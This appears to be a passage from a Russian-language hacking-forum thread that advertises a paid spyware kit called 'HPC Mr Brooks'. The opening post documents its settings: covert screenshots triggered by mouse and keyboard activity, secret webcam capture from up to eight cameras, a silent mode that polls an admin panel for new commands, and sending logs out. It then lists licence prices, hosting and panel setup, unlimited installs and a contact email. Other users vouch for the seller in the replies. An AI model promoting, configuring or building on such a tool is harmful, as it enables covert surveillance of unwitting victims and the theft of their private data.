    int
    scrsh_timer
    5

    Делать скриншоты минимум через данные промежутки секунд (отсчет не зависит от других таймеров, кроме таймера scrsh_min_time, из-за которого может приостанавливаться). Соответственно минимально возможно значение: 1 секунда. Не забудьте проследить чтобы значение scrsh_min_time было равно или менее указанного значения.

    int
    scrsh_count_allow
    100

    Сколько разрешается максимум сделать скраншотов в заданный промежуток секунд scrsh_timer.

    int
    scrsh_click
    2

    Делать скриншот через заданное кол-во секунд после нажатия на левую кнопку мыши.

    int
    scrsh_keyboard
    2

    Делать скриншот через заданное кол-во секунд после нажатия на клавишу клавиатуры.

    boolean
    scrsh_onlyif_activity
    0

    Если этот флаг установлен в 1, то если не была нажата кнопка мыши или клавиша на клавиатуре, в конце цикла scrsh_timer скриншот не будет сделан.

    int
    scrsh_min_time
    1

    Минимальный промежуток времени между двумя скриншотами. Естественно должно быть менее чем (или равно) scrsh_timer.
    Если скриншот должен быть сделан согласно предыдущим параметрам, но не соответствует этому таймеру, то производится ожидание указанного кол-ва секунд и только затем скриншот делается.

    boolean
    scrsh_timer_reset
    0

    Обнулять ли таймер scrsh_timer и сбрасывать значение scrsh_count_allow после того как лог отправлен.

    int
    scrsh_resize
    0

    Уменьшать ли разрешение скриншота, если его ширина превышает данное значение (минимальное значение 300). Следует учитывать, что алгоритм вычисления новых размеров следующий:
    ширина и высота делятся на 2 до тех пор, пока новое значение ширины не будет >= чем новое значение.

    int
    silent_mode
    0

    Если установлен silent mode, то шпион не будет отсылать скриншоты/логи, а будет с заданной в данном параметре периодичностью (кол-во секунд) отправлять запрос в панель и смотреть, есть ли новые команды.
    При этом максимальный размер лога ставится согласно значению log_max_size_new (естественно если это значение установлено).

    bool
    webcam_mode
    0

    0 - камера не выключается после захваченного кадра. 1 - камера выключается после захваченного кадра

    int
    webcam_checkdev_timer
    600

    С какой периодичностью проверять подключенные вебки, обновлять кол-во камер. минимум 5 сек.

    bool
    webcam_write_curwndandprocess
    0

    Писать или нет над изображением с вебки текущее окно и процесс

    int
    webcam_turnoff_time
    0

    Если с камер не поступало в течении заданного кол-ва секунд новых кадров, выключать их для экономии производительности.
    Внимание, эта опция так же будет работать если вы включили алгоритм сравнения и с камеры постоянно поступают одни и те же кадры согласно его настройкам.
    0 - отключить опцию.

    bool
    webcam_0_active
    webcam_1_active
    webcam_2_active
    webcam_3_active
    webcam_4_active
    webcam_5_active
    webcam_6_active
    webcam_7_active
    Первая 1, остальные по дефолту 0.

    Включить/выключить запись с данных веб-камер (id от нуля до 7 так же пишется в логе над изображением)

    int
    webcam_mode1_wait
    100

    При webcam_mode=1 сколько миллисекунд ждать после включения камеры прежде чем захватить кадр (после этого камера сразу выключается).

    Насчет апдейтов софта
    Идей насчет улучшения софта очень много. Каждый апдейт может быть объявлен на определенных условиях, это зависит от кол-ва изменений по сравнению с предыдущей версией. Это может быть free update (бесплатный апдейт для всех купивших начиная с создания этой темы софт), апдейт за определенную установленную стоимость и т.д. Не всегда при апдейте перечисляются все исправленные ошибки.

    Самые новые версии на данный момент:
    Админ-панель: 0.4
    exe: 0.07

    Standart Licence
    $60 и $20 заказ хостинга, инстал панели

    Extended Licence
    $500

    Extended лицензия гарантирует бесплатные апдейты, которые для стандарт лицензии могут быть платными, кроме особых случаев, когда возможно какие-то модули/апдейты будут стоить более чем стоимость Extended Licence.

    Количество машин, на которые можно поставить шпион, НЕ ограничено.

    Если необходимо больше возможностей (связь с панелью по https + больше вычислительной мощности), могу проинсталить вам виртуальный выделенный сервер на nqhost.com (минимум $7 в месяц будет стоить) в Германии, USA или России, настроить и поставить админ-панель туда, так же за доплату на этой же впске могу проинсталить персональный vpn-сервер. За подробностями пишите в лс.

    Контакты
    email hpcteam1@gmail.com
    либо пишите в лс
     
    • Like Like x 3
    Метки:
  2. K_NoW

    K_NoW HackMe Please

    Регистрация:
    16 мар 2014
    Сообщения:
    464
    Симпатии:
    222
    Давно тебя здесь не видел.
     
  3. TopicStarter Overlay
    vladyxa13

    vladyxa13

    Регистрация:
    5 янв 2014
    Сообщения:
    9
    Симпатии:
    3
    =)
    Софт написан Соколом админом HPC.name. Актуально, не знаю как у вас на ресурсе с апами(думаю раз в 5 дней). По вопросам ко мне в лс или на почту hpcteam1@gmail.com
    Всем удачи! Задавайте вопросы, на каждый найдется ответ.
     
  4. K_NoW

    K_NoW HackMe Please

    Регистрация:
    16 мар 2014
    Сообщения:
    464
    Симпатии:
    222
    Апать можно раз в 3 дня
    --- Добавил сообщение, 20 апр 2015 ---
    Софт очень даже чёткий, даю 100% гарантию что вас при покупке не кинут. Софт стоит своей цены.
     
  5. TopicStarter Overlay
    vladyxa13

    vladyxa13

    Регистрация:
    5 янв 2014
    Сообщения:
    9
    Симпатии:
    3
    Ребятки, заказываем! HPC Mr Brooks актуален. Мы всегда готовы ответить на любой вопрос по поводу софта! Возможны скидки, уточняйте.
     
  6. TopicStarter Overlay
    vladyxa13

    vladyxa13

    Регистрация:
    5 янв 2014
    Сообщения:
    9
    Симпатии:
    3
    Заказываем ребятки!:write:
     

Поделиться этой страницей

Загрузка...